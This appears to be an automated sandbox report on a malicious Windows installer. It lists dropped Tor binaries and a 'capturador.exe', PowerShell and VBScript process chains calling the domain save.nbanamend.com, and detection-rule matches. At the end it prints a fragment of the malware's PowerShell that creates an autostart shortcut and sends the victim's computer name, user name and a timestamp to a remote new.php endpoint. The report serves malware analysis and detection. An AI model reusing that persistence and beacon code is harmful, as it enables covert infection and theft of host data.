Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\JQHPQS\libssl-1_1.dllJump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\JQHPQS\libgcc_s_sjlj-1.dllJump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\JQHPQS\libevent-2-1-7.dllJump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\JQHPQS\libssp-0.dllJump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\JQHPQS\libevent_extra-2-1-7.dllJump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\JQHPQS\libwinpthread-1.dllJump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\JQHPQS\libcrypto-1_1.dllJump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\JQHPQS\capturador.exeJump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\JQHPQS\libevent_core-2-1-7.dllJump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\JQHPQS\tor.exeJump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\JQHPQS\QRROJT.exe (copy)Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\JQHPQS\zlib1.dllJump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\JQHPQS\tor-gencert.exeJump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\JQHPQS\MRZANK.exe (copy)Jump to dropped file
Source: Process Memory Space: powershell.exe PID: 3492, type: MEMORYSTRMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28
Source: C:\Windows\System32\msiexec.exeFile deleted: C:\Windows\Installer\MSIDE8B.tmpJump to behavior
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\3ed8de.msiJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_0776E0F023_2_0776E0F0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_0776A79723_2_0776A797
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_0776B50023_2_0776B500
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_0776908023_2_07769080
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_07762C4023_2_07762C40
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_07762C3023_2_07762C30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_0776DA6023_2_0776DA60
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_07788BE023_2_07788BE0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_07788BE023_2_07788BE0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_077A7E8823_2_077A7E88
Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
Source: libwinpthread-1.dll.1.drStatic PE information: Number of sections : 18 > 10
Source: libgcc_s_sjlj-1.dll.5.drStatic PE information: Number of sections : 17 > 10
Source: libevent_core-2-1-7.dll.1.drStatic PE information: Number of sections : 17 > 10
Source: libevent_core-2-1-7.dll.5.drStatic PE information: Number of sections : 17 > 10
Source: libssp-0.dll.1.drStatic PE information: Number of sections : 17 > 10
Source: libevent-2-1-7.dll.5.drStatic PE information: Number of sections : 17 > 10
Source: libssp-0.dll.5.drStatic PE information: Number of sections : 17 > 10
Source: libssl-1_1.dll.5.drStatic PE information: Number of sections : 18 > 10
Source: libcrypto-1_1.dll.1.drStatic PE information: Number of sections : 18 > 10
Source: libssl-1_1.dll.1.drStatic PE information: Number of sections : 18 > 10
Source: libcrypto-1_1.dll.5.drStatic PE information: Number of sections : 18 > 10
Source: libgcc_s_sjlj-1.dll.1.drStatic PE information: Number of sections : 17 > 10
Source: libevent_extra-2-1-7.dll.5.drStatic PE information: Number of sections : 17 > 10
Source: libevent-2-1-7.dll.1.drStatic PE information: Number of sections : 17 > 10
Source: libevent_extra-2-1-7.dll.1.drStatic PE information: Number of sections : 17 > 10
Source: libwinpthread-1.dll.5.drStatic PE information: Number of sections : 18 > 10
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: unknownProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\YwZpT3p5Rh.msi"
Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 4C63293B3FE9161A1CA264FB932A2300
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssFF45.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiFDAB.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrFDAC.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrFDAD.txt" -propSep " :<->: " -testPrefix "_testValue."
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\JQHPQS\ECSGNO.vbs"
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\JQHPQS\MRZANK.exe "C:\JQHPQS\MRZANK.exe" -f C:\JQHPQS\AZJVGE
Source: C:\JQHPQS\MRZANK.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy ByPass -File C:\JQHPQS\QIZABC.ps1 C:\JQHPQS\QRROJT.exe save.nbanamend.com
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\JQHPQS\ECSGNO.vbs"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
Source: C:\Windows\System32\wscript.exeProcess created: C:\JQHPQS\MRZANK.exe "C:\JQHPQS\MRZANK.exe" -f C:\JQHPQS\AZJVGE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\JQHPQS\MRZANK.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy ByPass -File C:\JQHPQS\QIZABC.ps1 C:\JQHPQS\QRROJT.exe save.nbanamend.com
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 4C63293B3FE9161A1CA264FB932A2300Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssFF45.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiFDAB.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrFDAC.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrFDAD.txt" -propSep " :<->: " -testPrefix "_testValue."Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\JQHPQS\ECSGNO.vbs" Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\JQHPQS\MRZANK.exe "C:\JQHPQS\MRZANK.exe" -f C:\JQHPQS\AZJVGE
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy ByPass -File C:\JQHPQS\QIZABC.ps1 C:\JQHPQS\QRROJT.exe save.nbanamend.com
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
Source: C:\Windows\System32\wscript.exeProcess created: C:\JQHPQS\MRZANK.exe "C:\JQHPQS\MRZANK.exe" -f C:\JQHPQS\AZJVGE
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy ByPass -File C:\JQHPQS\QIZABC.ps1 C:\JQHPQS\QRROJT.exe save.nbanamend.com
Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Documents\20211123Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\TEMP\~DFED7ED3B179C7609A.TMPJump to behavior
Source: classification engineClassification label: mal72.evad.winMSI@27/90@1/7
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: YwZpT3p5Rh.msiStatic file information: TRID: Microsoft Windows Installer (77509/1) 52.18%
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7108:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4188:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5864:120:WilError_01
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\JQHPQS\ECSGNO.vbs"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
Source: YwZpT3p5Rh.msiStatic file information: File size 6378496 > 1048576
Source: Binary string: .textn.pdb `4 source: powershell.exe, 00000017.00000002.546323293.0000000007540000.00000004.00000001.sdmp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_07787710 push es; ret 23_2_07787720
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_077A2794 push E86CA943h; ret 23_2_077A2799
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_077AC017 push eax; mov dword ptr [esp], edx23_2_077ABFAC
Source: libcrypto-1_1.dll.1.drStatic PE information: section name: /4
Source: libcrypto-1_1.dll.1.drStatic PE information: section name: /19
Source: libcrypto-1_1.dll.1.drStatic PE information: section name: /31
Source: libcrypto-1_1.dll.1.drStatic PE information: section name: /45
Source: libcrypto-1_1.dll.1.drStatic PE information: section name: /57
Source: libcrypto-1_1.dll.1.drStatic PE information: section name: /70
Source: libcrypto-1_1.dll.1.drStatic PE information: section name: /81
Source: libcrypto-1_1.dll.1.drStatic PE information: section name: /92
Source: libevent_core-2-1-7.dll.1.drStatic PE information: section name: /4
Source: libevent_core-2-1-7.dll.1.drStatic PE information: section name: /19
Source: libevent_core-2-1-7.dll.1.drStatic PE information: section name: /31
Source: libevent_core-2-1-7.dll.1.drStatic PE information: section name: /45
Source: libevent_core-2-1-7.dll.1.drStatic PE information: section name: /57
Source: libevent_core-2-1-7.dll.1.drStatic PE information: section name: /70
Source: libevent_core-2-1-7.dll.1.drStatic PE information: section name: /81
Source: libevent_core-2-1-7.dll.1.drStatic PE information: section name: /92
Source: libevent_extra-2-1-7.dll.1.drStatic PE information: section name: /4
Source: libevent_extra-2-1-7.dll.1.drStatic PE information: section name: /19
Source: libevent_extra-2-1-7.dll.1.drStatic PE information: section name: /31
Source: libevent_extra-2-1-7.dll.1.drStatic PE information: section name: /45
Source: libevent_extra-2-1-7.dll.1.drStatic PE information: section name: /57
Source: libevent_extra-2-1-7.dll.1.drStatic PE information: section name: /70
Source: libevent_extra-2-1-7.dll.1.drStatic PE information: section name: /81
Source: libevent_extra-2-1-7.dll.1.drStatic PE information: section name: /92
Source: libevent-2-1-7.dll.1.drStatic PE information: section name: /4
Source: libevent-2-1-7.dll.1.drStatic PE information: section name: /19
Source: libevent-2-1-7.dll.1.drStatic PE information: section name: /31
Source: libevent-2-1-7.dll.1.drStatic PE information: section name: /45
Source: libevent-2-1-7.dll.1.drStatic PE information: section name: /57
Source: libevent-2-1-7.dll.1.drStatic PE information: section name: /70
Source: libevent-2-1-7.dll.1.drStatic PE information: section name: /81
Source: libevent-2-1-7.dll.1.drStatic PE information: section name: /92
Source: libgcc_s_sjlj-1.dll.1.drStatic PE information: section name: /4
Source: libgcc_s_sjlj-1.dll.1.drStatic PE information: section name: /19
Source: libgcc_s_sjlj-1.dll.1.drStatic PE information: section name: /31
Source: libgcc_s_sjlj-1.dll.1.drStatic PE information: section name: /45
Source: libgcc_s_sjlj-1.dll.1.drStatic PE information: section name: /57
Source: libgcc_s_sjlj-1.dll.1.drStatic PE information: section name: /70
Source: libgcc_s_sjlj-1.dll.1.drStatic PE information: section name: /81
Source: libgcc_s_sjlj-1.dll.1.drStatic PE information: section name: /92
Source: libssl-1_1.dll.1.drStatic PE information: section name: /4
Source: libssl-1_1.dll.1.drStatic PE information: section name: /19
Source: libssl-1_1.dll.1.drStatic PE information: section name: /31
Source: libssl-1_1.dll.1.drStatic PE information: section name: /45
Source: libssl-1_1.dll.1.drStatic PE information: section name: /57
Source: libssl-1_1.dll.1.drStatic PE information: section name: /70
Source: libssl-1_1.dll.1.drStatic PE information: section name: /81
Source: libssl-1_1.dll.1.drStatic PE information: section name: /92
Source: libssp-0.dll.1.drStatic PE information: section name: /4
Source: libssp-0.dll.1.drStatic PE information: section name: /19
Source: libssp-0.dll.1.drStatic PE information: section name: /31
Source: libssp-0.dll.1.drStatic PE information: section name: /45
Source: libssp-0.dll.1.drStatic PE information: section name: /57
Source: libssp-0.dll.1.drStatic PE information: section name: /70
Source: libssp-0.dll.1.drStatic PE information: section name: /81
Source: libssp-0.dll.1.drStatic PE information: section name: /92
Source: libwinpthread-1.dll.1.drStatic PE information: section name: /4
Source: libwinpthread-1.dll.1.drStatic PE information: section name: /19
Source: libwinpthread-1.dll.1.drStatic PE information: section name: /31
Source: libwinpthread-1.dll.1.drStatic PE information: section name: /45
Source: libwinpthread-1.dll.1.drStatic PE information: section name: /57
Source: libwinpthread-1.dll.1.drStatic PE information: section name: /70
Source: libwinpthread-1.dll.1.drStatic PE information: section name: /81
Source: libwinpthread-1.dll.1.drStatic PE information: section name: /92
Source: libcrypto-1_1.dll.5.drStatic PE information: section name: /4
Source: libcrypto-1_1.dll.5.drStatic PE information: section name: /19
Source: libcrypto-1_1.dll.5.drStatic PE information: section name: /31
Source: libcrypto-1_1.dll.5.drStatic PE information: section name: /45
Source: libcrypto-1_1.dll.5.drStatic PE information: section name: /57
Source: libcrypto-1_1.dll.5.drStatic PE information: section name: /70
Source: libcrypto-1_1.dll.5.drStatic PE information: section name: /81
Source: libcrypto-1_1.dll.5.drStatic PE information: section name: /92
Source: libevent-2-1-7.dll.5.drStatic PE information: section name: /4
Source: libevent-2-1-7.dll.5.drStatic PE information: section name: /19
Source: libevent-2-1-7.dll.5.drStatic PE information: section name: /31
Source: libevent-2-1-7.dll.5.drStatic PE information: section name: /45
Source: libevent-2-1-7.dll.5.drStatic PE information: section name: /57
Source: libevent-2-1-7.dll.5.drStatic PE information: section name: /70
Source: libevent-2-1-7.dll.5.drStatic PE information: section name: /81
Source: libevent-2-1-7.dll.5.drStatic PE information: section name: /92
Source: libevent_core-2-1-7.dll.5.drStatic PE information: section name: /4
Source: libevent_core-2-1-7.dll.5.drStatic PE information: section name: /19
Source: libevent_core-2-1-7.dll.5.drStatic PE information: section name: /31
Source: libevent_core-2-1-7.dll.5.drStatic PE information: section name: /45
Source: libevent_core-2-1-7.dll.5.drStatic PE information: section name: /57
Source: libevent_core-2-1-7.dll.5.drStatic PE information: section name: /70
Source: libevent_core-2-1-7.dll.5.drStatic PE information: section name: /81
Source: libevent_core-2-1-7.dll.5.drStatic PE information: section name: /92
Source: libevent_extra-2-1-7.dll.5.drStatic PE information: section name: /4
Source: libevent_extra-2-1-7.dll.5.drStatic PE information: section name: /19
Source: libevent_extra-2-1-7.dll.5.drStatic PE information: section name: /31
Source: libevent_extra-2-1-7.dll.5.drStatic PE information: section name: /45
Source: libevent_extra-2-1-7.dll.5.drStatic PE information: section name: /57
Source: libevent_extra-2-1-7.dll.5.drStatic PE information: section name: /70
Source: libevent_extra-2-1-7.dll.5.drStatic PE information: section name: /81
Source: libevent_extra-2-1-7.dll.5.drStatic PE information: section name: /92
Source: libgcc_s_sjlj-1.dll.5.drStatic PE information: section name: /4
Source: libgcc_s_sjlj-1.dll.5.drStatic PE information: section name: /19
Source: libgcc_s_sjlj-1.dll.5.drStatic PE information: section name: /31
Source: libgcc_s_sjlj-1.dll.5.drStatic PE information: section name: /45
Source: libgcc_s_sjlj-1.dll.5.drStatic PE information: section name: /57
Source: libgcc_s_sjlj-1.dll.5.drStatic PE information: section name: /70
Source: libgcc_s_sjlj-1.dll.5.drStatic PE information: section name: /81
Source: libgcc_s_sjlj-1.dll.5.drStatic PE information: section name: /92
Source: libssl-1_1.dll.5.drStatic PE information: section name: /4
Source: libssl-1_1.dll.5.drStatic PE information: section name: /19
Source: libssl-1_1.dll.5.drStatic PE information: section name: /31
Source: libssl-1_1.dll.5.drStatic PE information: section name: /45
Source: libssl-1_1.dll.5.drStatic PE information: section name: /57
Source: libssl-1_1.dll.5.drStatic PE information: section name: /70
Source: libssl-1_1.dll.5.drStatic PE information: section name: /81
Source: libssl-1_1.dll.5.drStatic PE information: section name: /92
Source: libssp-0.dll.5.drStatic PE information: section name: /4
Source: libssp-0.dll.5.drStatic PE information: section name: /19
Source: libssp-0.dll.5.drStatic PE information: section name: /31
Source: libssp-0.dll.5.drStatic PE information: section name: /45
Source: libssp-0.dll.5.drStatic PE information: section name: /57
Source: libssp-0.dll.5.drStatic PE information: section name: /70
Source: libssp-0.dll.5.drStatic PE information: section name: /81
Source: libssp-0.dll.5.drStatic PE information: section name: /92
Source: libwinpthread-1.dll.5.drStatic PE information: section name: /4
Source: libwinpthread-1.dll.5.drStatic PE information: section name: /19
Source: libwinpthread-1.dll.5.drStatic PE information: section name: /31
Source: libwinpthread-1.dll.5.drStatic PE information: section name: /45
Source: libwinpthread-1.dll.5.drStatic PE information: section name: /57
Source: libwinpthread-1.dll.5.drStatic PE information: section name: /70
Source: libwinpthread-1.dll.5.drStatic PE information: section name: /81
Source: libwinpthread-1.dll.5.drStatic PE information: section name: /92
Source: capturador.exe.1.drStatic PE information: 0xA2C71EB8 [Sun Jul 16 07:35:20 2056 UTC]
Source: C:\Windows\System32\msiexec.exeFile created: C:\ProgramData\Leitor\libgcc_s_sjlj-1.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\ProgramData\Leitor\libwinpthread-1.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\ProgramData\Leitor\tor.exeJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\ProgramData\Leitor\capturador.exeJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\ProgramData\Leitor\libcrypto-1_1.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\ProgramData\Leitor\libevent_core-2-1-7.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\ProgramData\Leitor\libevent-2-1-7.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\ProgramData\Leitor\libevent_extra-2-1-7.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\ProgramData\Leitor\libssl-1_1.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\ProgramData\Leitor\libssp-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\ProgramData\Leitor\tor-gencert.exeJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\ProgramData\Leitor\zlib1.dllJump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\JQHPQS\libssl-1_1.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\ProgramData\Leitor\tor.exeJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\ProgramData\Leitor\capturador.exeJump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\JQHPQS\libssp-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\ProgramData\Leitor\libcrypto-1_1.dllJump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\JQHPQS\libcrypto-1_1.dllJump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\JQHPQS\libevent_core-2-1-7.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\ProgramData\Leitor\libevent_core-2-1-7.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\ProgramData\Leitor\libevent-2-1-7.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\ProgramData\Leitor\libssp-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\ProgramData\Leitor\zlib1.dllJump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\JQHPQS\zlib1.dllJump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\JQHPQS\tor-gencert.exeJump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\JQHPQS\MRZANK.exe (copy)Jump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\ProgramData\Leitor\libgcc_s_sjlj-1.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\ProgramData\Leitor\libwinpthread-1.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIDE8B.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE275.tmpJump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\JQHPQS\libgcc_s_sjlj-1.dllJump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\JQHPQS\libevent-2-1-7.dllJump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\JQHPQS\libevent_extra-2-1-7.dllJump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\JQHPQS\libwinpthread-1.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIFCD8.tmpJump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\JQHPQS\capturador.exeJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE17A.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE39F.tmpJump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\JQHPQS\tor.exeJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\ProgramData\Leitor\libevent_extra-2-1-7.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\ProgramData\Leitor\libssl-1_1.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\ProgramData\Leitor\tor-gencert.exeJump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\JQHPQS\QRROJT.exe (copy)Jump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIDE8B.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE275.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIFCD8.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE17A.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE39F.tmpJump to dropped file

Boot Survival:

barindex
Powershell creates an autostart linkShow sources
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: .lnk"$WshShell = New-Object -ComObject WScript.Shell$Shortcut = $WshShell.CreateShortcut($lnkFilename)$Shortcut.TargetPath = $vbsPath$Shortcut.WorkingDirectory = $newPath$Shortcut.WindowStyle = 7$Shortcut.Save()#Start-Process -FilePath $lnkFileName#$hasCore = "No"Get-Process | Where-Object { if ($_.ProcessName -eq "core") { $hasCore = "Yes"} }$dataEnc = [System.Web.HttpUtility]::UrlEncode("$($env:COMPUTERNAME)|$($env:USERNAME)|$hasCore|$(Get-Date -Format `"dd/MM/yyyy HH:mm`")")$response = Invoke-WebRequest -UseBasicParsing -Uri "https://$domain/new.php?data=$dataEnc"#Remove-Item -Path "$currentPath\*" $_.PSParentPath.Replace("Microsoft.PowerShell.Core\FileSystem::", "") [String]::Format("{0,10} {1,8}", $_.LastWriteTime.ToString("d"), $_.LastWriteTime.ToString("t")) if ($_ -is [System.IO.DirectoryInfo]) { return '' }if ($_.Attributes 